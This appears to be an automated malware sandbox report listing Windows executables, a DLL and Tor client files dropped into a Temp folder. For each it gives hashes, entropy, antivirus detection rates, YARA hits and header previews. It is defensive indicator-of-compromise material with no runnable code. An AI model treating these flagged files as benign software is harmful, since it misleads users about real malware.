                                                                                                                                                                    Preview:dir-key-certificate-version 3..fingerprint 27102BC123E7AF1D4741AE047E160C91ADC76B21..dir-key-published 2024-02-07 19:34:53..dir-key-expires 2025-02-07 19:34:53..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAuxgnMVH4vwBjMeGvrEODOYcjbCS4N+Wt0SZ6XA5I08HyMf5AbaaF..MDscJBRIUOp7DyLmUwK+jp+QI8pUjjKsB8S0ctb/J3Im2T6CXnP2KgEfVmpNVQmV..XdMm8cRZl1uIZDDBAXizSQ51f9A17TJh7pF/5khYp/SAzl6aO5ETn7ry0ITiJnNa..6cY+400F7ZBA8NuXnCHVGfmpFFsiJKFrS1Kve629eeaNEd3mynRviBXJy5a4NEGf..y42Ev8on6SxEnF9OG0NMJ081/+mP+j8Dsl3+Uehzr9B42MQQfDo4RdYGrt9XolBm..L4eay1ieZEsFeDy0TMfiGGbr90wo1fgGLHIRSfTNLhhPJ/f9cTZPe98rhSgGWiAd..RvK5SljoIOR4qdS9/aiZkj1P+etvh1rIQUcG4/xCOBnouEBK+DDHZFqyMtpMPtV0..Bxi20DVaMJcyhdfjVqcRSyuR8tlOnTid6QwBj6kgIIfMaC+4Ht6yO/SYquCWlaZl..y7Pu7li8WyW9AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAqbw3BcQ7lAjDy4geKZKLdVD5gTuYm2rO20K1iHQhUR2dChQF1AON..ORyQMaJS9pBIKE27IAIFcCzrbgJ5dggKIOk+1A7du7dbl+RClLM4cBXaqKBiNmWK..s6qLHwM1E6la2Ts5b3XUhMlryuNl

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2764996
                                                                                                                                                                    Entropy (8bit):5.611307879156549
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:5Fs5sMgUlyGepUBtiyGI6sblIr4xcWVFaud6cpaqPr3+JA0wLj:5O5oUyCiyXr2Ma/cgOyJQn
                                                                                                                                                                    MD5:A826937369755BAD667D25BEFB37DD19
                                                                                                                                                                    SHA1:668335BC0B1C5E79B98D6D30B871641C5D711EF6
                                                                                                                                                                    SHA-256:AD12C3922382398EA7C436A658299B63FEBDFF972261CBA2FC311152776FC8CE
                                                                                                                                                                    SHA-512:B906933F00B6711F4CFCCA2AD3361B4AF69983E3A74F050FA905E4F89BBA0CDECA8918024862D87BD3E407BA48E1DCFCFD84C410787C7707DA7B35027EE78D58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-08 17:00:00.fresh-until 2024-02-08 18:00:00.valid-until 2024-02-08 20:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (15714)
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):19492619
                                                                                                                                                                    Entropy (8bit):4.82814947069451
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:NY7w01ix3gcGWS4LfwRbtChA/JSnS4VeY:p
                                                                                                                                                                    MD5:0391C72298C8F4F87C031BBE85C8286D
                                                                                                                                                                    SHA1:8DBDF1F9555C8584DDF99896C24B4755E65607B1
                                                                                                                                                                    SHA-256:332E01B3AD57A3686A84C2B43E2301586E94DB4C7A165E1F7E053AF0998CBE1F
                                                                                                                                                                    SHA-512:FB25D397AACE070710DEC70F469C579B14F19B4E4111D7A89989FEEE8598D9F0FBEE6D24E1D4AFFD26EB65DD7E66EF20CF92056D8120F953E8A1CBDD7A06ACC3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@last-listed 2024-02-08 18:13:38.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMkAP0uCEJ89XmD113C6jla21YZN1EpsGtSk5CZVRWgHkKCWd9DldMlk.0QiWLA4004LtNZzRCQhUHCkdw+Xstt/HqlR1gIxqyyGwYZGiSOr5beiL/kisAIXU.isSx2FfygO2ZiCTu1X0UP7Az3QzpCGKsyhBesaPZdTpKnN76D1azAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key SrajEQVTOVVdltYDXNVGBWtlT48OZ0alxU0/5YRf/xI.id ed25519 JkP4nl5gqv9QKA9wyA7uR80FI/4W2aQbxTxV/fPiif0.@last-listed 2024-02-08 18:13:38.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMtDc6t9rd2BDWFIV5wjpbweaoMXfuK7x8YwxcGldPxjmRDQYNhQJpCe.JXlcmnNef85Scq0qJjiI956JdM+6IWFs9mN989ynMGRcZrIv87ZbyoGUrKh7m6nW.nmdpURINkJlLZBdFkWpkX3FjBDqgRfR4PngyH65iH41JRwwjFNbDAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key nFGC+TQuOoshg3BgjaPahTHbYaN+9SJaAKaH37HE3Ww.id ed25519 OLp2JoPMyfZ8S683sjs0Jg9pKFzb/j9tBTZxNSsCk2A.@last-listed 2024-02-08 18:13:38.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAK5AAI9aG1axxhofMZJ2JRDGMI//h12/weI4OrbpSk/HeLPi+PFuY+jX.KJFjjgcEbS6c50+XPTVa5xn/+0HmE22gBQ8hRK1s88nOL

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3496
                                                                                                                                                                    Entropy (8bit):5.327143766503475
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cNW3dUpQHNRFHoXGQYtVn5g7Qc+uzsQ7MG7G59hg0x7NkGT:O56RFHoXGQe5IQ5uzswB7G59hg0vkGT
                                                                                                                                                                    MD5:BB5B2F4AB246007BDB9E9B727A402B7F
                                                                                                                                                                    SHA1:5FA6C4F926C96633555226DC56E27DD803955DCB
                                                                                                                                                                    SHA-256:CC45C4BDDEA3EE288FDFB688429F058EAC3AA9CA26CA2A08D94E734D670FDE90
                                                                                                                                                                    SHA-512:7DD5056A7565D0EF8C327CB1061B626EB5E50835B0704A9F0EB7EE9F73F4CD932C49B8FCA38992929EBA6DAFDC5E028729249C9CCB21C1E1ED224C81F598FCEE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Tor state file last generated on 2024-02-08 19:20:39 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=937CAFC317E8DC0F05E2AA314DA3DADBEDD509D2 nickname=overtake sampled_on=2024-02-06T03:44:43 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-31T10:08:26 confirmed_idx=1..Guard in=default rsa_id=4C25542B7649FC0472EDBF77521EA578F9AF5155 nickname=dc6jgk12d sampled_on=2024-02-06T13:55:32 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-02-04T17:46:49 confirmed_idx=0..Guard in=default rsa_id=AA7630738F82C4DF26BB8EFF131564DACDEAC64C nickname=Unnamed sampled_on=2024-01-31T05:12:05 sampled_idx=2 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=4CE6D83FFA8AD24767007E8C972F371F2468F09A nickname=bauruine sampled_on=2024-02-03T10:53:51 sampled_idx=3 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=D11A3C113BBD6CC7A89CC6AB6FD7783F7749CB65 nickname=gazelle sampled_on=2024-02-04T13:27:57 sampled_i

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2764996
                                                                                                                                                                    Entropy (8bit):5.611307879156549
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:5Fs5sMgUlyGepUBtiyGI6sblIr4xcWVFaud6cpaqPr3+JA0wLj:5O5oUyCiyXr2Ma/cgOyJQn
                                                                                                                                                                    MD5:A826937369755BAD667D25BEFB37DD19
                                                                                                                                                                    SHA1:668335BC0B1C5E79B98D6D30B871641C5D711EF6
                                                                                                                                                                    SHA-256:AD12C3922382398EA7C436A658299B63FEBDFF972261CBA2FC311152776FC8CE
                                                                                                                                                                    SHA-512:B906933F00B6711F4CFCCA2AD3361B4AF69983E3A74F050FA905E4F89BBA0CDECA8918024862D87BD3E407BA48E1DCFCFD84C410787C7707DA7B35027EE78D58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-08 17:00:00.fresh-until 2024-02-08 18:00:00.valid-until 2024-02-08 20:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\5A89.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1998848
                                                                                                                                                                    Entropy (8bit):7.9427880780763775
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:v1r2g+mLqqeaVjSeluJsslFHfjeKgHEaVjsKHzG:drz+OqjXeluJxlFHf6zHj
                                                                                                                                                                    MD5:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                    SHA1:50992F712B281DB70518E6D404084E26DCD98B98
                                                                                                                                                                    SHA-256:A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                                                                                                                                                                    SHA-512:18A2FA6E9C97281328DE819126DCCB6CC8576E11EA11A8FABA629DA58E724040427C7D941CE0F935948195C30DA6D60A6873D7E3E9613EBA7DF42BDE1A3ABA1F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..............~.......~.%.....~...}.....(.........y...~.......~.!.....~.&.....Rich............................PE..L...}N.d............................,........0....@..........................0.......v.......................................\..P....0..0...................................................hW...... W..@............0...............................text............................... ..`.rdata...5...0...6..................@..@.data...D....p..."...T..............@....fofufe.|............v..............@....tls.................x..............@....safaz....... ......................@....rsrc...0....0......................@..@........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\6056.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3454976
                                                                                                                                                                    Entropy (8bit):7.794278894822303
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:zD9Zf63RpjUA2/SBEz7e24xcMDSMIZbe3o9YJumw4wMr2ciI+:zxaFUA2/SO+5OMOMIZb8oya4wMr2ciI
                                                                                                                                                                    MD5:50F2E865696BEEB3C20E1F05DC72D03C
                                                                                                                                                                    SHA1:21A7625CAE875B09FD20C14F5F5217E2FD51CAB4
                                                                                                                                                                    SHA-256:CA35D0581791390F299C4CE45CAC0339CFA11EBEF38FDE517C9823C6CF6D3B3E
                                                                                                                                                                    SHA-512:D8386334A31A62B8280D659DE1BBC72971C18AE481961F08E8B4E77FA6B107E880F02DCF5B28F3EFA2DB3833D17075F6283550CC0C0FC74D935C427C314747C8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.................<....1.....D.@...........@...........................q.......5...@..................................g/.d.....B......................B.,....................................................P..4............................text...@:.......................... ..`.rdata.......P......................@..@.data...L....p......................@.............0...................... ..`..........P......................@........ g+..`...h+................. ..`.reloc..,.....B......n+.............@..@.rsrc........B.......+.............@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\6374.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):431104
                                                                                                                                                                    Entropy (8bit):7.865829876036064
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:4phcsngKdHpPXECq6Xz4G/rmnHXekVB9YNeeA23YMd7pMFW54AXIEB93KWZMxEHL:4pasngwHpP5qa4G4eIWsyHd0XKBBXL
                                                                                                                                                                    MD5:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                    SHA1:5A7141B167056BF8F01C067EBE12ED4CCC608DC7
                                                                                                                                                                    SHA-256:E40C8E14E8CB8A0667026A35E6E281C7A8A02BDF7BC39B53CFE0605E29372888
                                                                                                                                                                    SHA-512:430C8B43C2CBB937D2528FA79C754BE1A1B80C95C45C49DBA323E3FE6097A7505FC437DDAFAB54B21D00FBA9300B5FA36555535A6FA2EB656B5AA45CCF942E23
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..Y..Y..3..p..Y..[....[..Y..V....X..RichY..................PE..L......d..........................................@......................................@.........................................................................P...................................................8............................text............................... ..`.rdata... ..........................@..@.data... ....0......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\6653.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1798144
                                                                                                                                                                    Entropy (8bit):7.948466012036162
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:KDb+c/btvXiuHry2X3MpNkZ5a2mTr9JCmIdE9IX1xZ9NqkPQZmKHpAVG/sg3klLh:W9vXiuL6p05aV2dfzZ9NTM/Hp9sgLn
                                                                                                                                                                    MD5:CF9B8BBF09EC4BB82142B056C1B427C7
                                                                                                                                                                    SHA1:1E00E83C6CFEA015204C9E0AF8076FAED57CDC41
                                                                                                                                                                    SHA-256:F95336C1991BC271C37ACDC0257B3C876BEAA315E1D2A3F223CD7F6A12CAA2A9
                                                                                                                                                                    SHA-512:FEC4413424C84434689C992EFA1EBFB8F89B2906A99D665B4327E906A243340C36C1E4D8BFA4918CCABD52FBBD581CE26B7FEA8F34BCACA5621D4D20CA43777D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................|...........!..L.!This program cannot be run in DOS mode....$.......&...by..by..by...'..<x....r.2y..k.*..x..."..(x... ...x....e..y..E.c._x..E.`..x....c..y....Q..y..by..^y....`.{y....g..y..a.q..x....b..x...$...y....g..x....0..x..k.-..y....`.sy..."..sx...'...y..."...y...$...x..a.N.rx..Richby..............................PE..L...BS.e...........!..... ...`...... !.......0....@..........................................................................J..|.... .......................0...=..P2..T............................................0...............................text............ .................. ..`.rdata...'...0...0...0..............@..@.data...d....`.......`..............@....rsrc........ ......................@..@.reloc..FU...0...`..................@..B............................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\78A4.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8336105
                                                                                                                                                                    Entropy (8bit):7.999559951725167
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:196608:jk8nFT3Vt2MPm7Lle9cODaXqN9qozvfyEJ5HyGRIYpuQwcKxV/+OS0Qo:ZFTloMPm7LrzQqojfyI5H83xR+ho
                                                                                                                                                                    MD5:7176404D8394DECDC9399BB62C01A2FF
                                                                                                                                                                    SHA1:BC6DB5DA417F2620588292EDDF4C5ACB5E3D7781
                                                                                                                                                                    SHA-256:0BE899F1700DB62CD480904395676AAAB022EB3BE4EA61CC3AB9071CCBE54900
                                                                                                                                                                    SHA-512:36982AD0A5D8B790D5B7F1BEFE86CC2CFA6339E5C3C818B3139994BEF0ADEEAA691200DF3706C73DE14A034CD6F6C36D81E4D77D99D95454F4022C68561E3D70
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\914D.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9104384
                                                                                                                                                                    Entropy (8bit):7.9258891229768595
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
                                                                                                                                                                    MD5:CEAE65EE17FF158877706EDFE2171501
                                                                                                                                                                    SHA1:B1F807080DA9C25393C85F5D57105090F5629500
                                                                                                                                                                    SHA-256:0DAC8A3FE3C63611B49DB21B2756B781CC4C9117C64007E0C23E6D3E7CA9EE49
                                                                                                                                                                    SHA-512:5214FEBFAB691B53CA132E75E217E82A77E438250695D521DBF6BC1770D828F2E79A0070FD746A73E29ACC11BF9A62CEAFB1CF85547C7C0178D49A740FF9AE7B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\914D.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ... ....@.. .......................`............@.................................`...K.... ..@....................@....................................................... ............... ..H............text........ ..................... ..`.rsrc...@.... .....................@..@.reloc.......@.....................@..B........................H.......................'..............................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\AD52.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):175104
                                                                                                                                                                    Entropy (8bit):6.8345161639264935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:4LWsq2ldQl+lgiKCt2Cp7pTqhVones/wC4pAhKqHee:4LWsqmQKgFwn7puuesqr
                                                                                                                                                                    MD5:BA79778FB5C76EE86A3719452732A68B
                                                                                                                                                                    SHA1:85AE245819AD23FDB546AB3D9F0C70E22BB71AFA
                                                                                                                                                                    SHA-256:61222B4DA1A2082061FEDF9D91E70A13E5B5DF70D3CAC424A5F4C1FC65916312
                                                                                                                                                                    SHA-512:6AC7141D86C6F8C6C1FD237AE75D189F564CE84A4DDCFB78334536E0D772A1DC3FF831744E58C228AA311C7F58B8BB5831FB65C687DA558432396275E654F09C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................F.....s.....G.....~..........B.....w.....p....Rich...................PE..L....|.c.................(...4{..............@....@..........................p}......`......................................$h..<....P}.0...................................................Xe.......................@...............................text....&.......(.................. ..`.rdata...1...@...2...,..............@..@.data.....z..........^..............@....rofi...|.....}......|..............@....tls......... }......~..............@....rehopeb.....0}.....................@..@.jidexi......@}.....................@....rsrc...0....P}.....................@..@........................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\B68B.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):174080
                                                                                                                                                                    Entropy (8bit):6.819076413955178
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:FKSFLhXu8Bpr22oxIpGO4S6xKwrODATJyQhiWApJI1E:FKILBuM62oiU26rrO2JyP
                                                                                                                                                                    MD5:5F11B580F135B8479A48BDF6000C31CE
                                                                                                                                                                    SHA1:CE9E605F255F4F47ACF3EE331654DD7EB65F85AB
                                                                                                                                                                    SHA-256:78466D3EE049666B1A70F10427B2CCB7DBE775E239552F9EA5C9089AC51C3351
                                                                                                                                                                    SHA-512:B036EDE7DB5C1B97F9983C108322044F78CBB06A92B6C28B4E54E06A98255BBED39C2C1029C7C122B5C015BC854B3289C36FA6AFD8C458022FB4F62C33435433
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................L.....y.....M.....t..........H.....}.....z....Rich...................PE..L...j..c.................$...4{..............@....@..........................p}.............................................Th..<....P}.0....................................................e.......................@...............................text...r".......$.................. ..`.rdata...1...@...2...(..............@..@.data.....z..........Z..............@....wet....|.....}......x..............@....tls......... }......z..............@....mixifi......0}.....................@..@.civo........@}.....................@....rsrc...0....P}.....................@..@........................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4979200
                                                                                                                                                                    Entropy (8bit):6.419395528077673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:90oSiZ63YBmS9+rCgpvH8la0ZxRh+caGnj8HEQUhexTUT+1d/2/Tbt:0Ula0cGwXUheabt
                                                                                                                                                                    MD5:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                                                                                                    SHA1:D0189CBA430F5EEA07EFE1AB4F89ADF5AE2453DB
                                                                                                                                                                    SHA-256:50A46B3120DA828502EF0CABA15DEFBAD004A3ADB88E6EACF1F9604572E2D503
                                                                                                                                                                    SHA-512:473DFA66A36FEED9B29A43245074141478327CE22BA7CCE512599379DCB783B4D665E2D65C5E9750B988C7ED8F6C3349A7A12D4B8B57C89840EEE6CA6E1A30CD
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^..................9..X.......9.......9...@.......................... N..................@....................<......`<..B...`A.......................<.tk............................<.....................Ll<.......<......................text...8`9......b9................. ..`.itext...;....9..<...f9............. ..`.data.........9.......9.............@....bss....`.....:..........................idata...B...`<..D...|:.............@....didata.......<.......:.............@....edata........<.......:.............@..@.tls....L.....<..........................rdata..].....<.......:.............@..@.reloc..tk....<..l....:.............@..B.rsrc........`A......<?.............@..@............. N.......K.............@..@................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\C338.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):678912
                                                                                                                                                                    Entropy (8bit):7.497991289164504
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:QKWx9unShF7rjHEB1LFn4jT6RTxry/3cXT3mDBB/SWNy84oeYxYmE:Qa6RwRyT6Le/MijXNXNxYm
                                                                                                                                                                    MD5:98B480339C9A8C8316F5255F976FD575
                                                                                                                                                                    SHA1:306AFD77C684C9F20645030CC78ED42D8507CA87
                                                                                                                                                                    SHA-256:CE2233AFBAAE3DBD11DE511A72182D30CC1F7ABFFB9F35506954FABDF723C234
                                                                                                                                                                    SHA-512:AED448B6AAE5796B3880262CBD4310665158A765AED5B4CBCBECF9856DC20C111ED499C7EEBB9D440A467E9FCE476B73597CD1DF9B1293DB345646D7C840C66B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O..'..ct..ct..ctd..t..ctd..tz.ctd..t/.ct...t..ct..btm.ctd..t..ctd..t..ctd..t..ctRich..ct........................PE..L.....ec.................D...........+.......`....@..................................&......................................L...<....P..............................................................................`...............................text....B.......D.................. ..`.rdata...K...`...L...H..............@..@.data...p........"..................@....tls.........@......................@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................

